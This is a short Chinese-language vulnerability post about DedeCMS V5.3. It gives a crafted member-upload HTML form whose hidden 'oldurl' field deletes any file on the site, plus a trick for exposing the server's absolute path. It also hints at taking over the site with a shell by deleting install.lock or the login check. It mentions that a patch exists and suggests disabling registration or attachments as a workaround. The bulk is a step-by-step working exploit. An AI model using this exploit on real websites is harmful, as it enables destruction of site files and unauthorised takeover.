编外:官方已出补丁,相关用户请及时修正
首发:www.YDTeam.Com
1.删除网站任意文件. 2.爆绝对路径 影响系统 = DedeCMS V5.31.删除任意文件. 注册正常用户…随意找个地方上传个附件就OK. 部分代码: 复制代码<form class=”mTB10 mL10 mR10″ name=”form1″ action=”http://网站地址/member/uploads_edit.php” method=”post” enctype=”multipart/form-data”> <input type=”hidden” name=”aid” value=”28″ /> <input type=”hidden” name=”mediatype” value=”1″ /> <input type=”hidden” name=”oldurl” value=”要删除的文件” /> <!–如value=”/index.php”> <input type=”hidden” name=”dopost” value=”save” /> <table cellspacing=”1″ class=”submit”>修改完毕后.打开HTML页.直接点提交. 然后在用户管理附件里点击删除.2.爆路径. 也是利用原来的html代码.. 复制代码<td align=”right” valign=”top”>更换附件:</td> <td><input name=”addonfile” type=”file” id=”addonfile” >把type=”file”删除.保存.然后打开.直接点提交.就可以爆路径了.. 具体的如何利用这个漏洞拿到SHELL.就看你自己的想象力了..比如删除install.lock….比如删除用户登陆检测.. 临时解决方法.:禁止用户注册.或禁止用户发附件
生命不息,在任何一种博大的辉煌之后,都掩藏着许多鲜为人知的艰难的奋斗。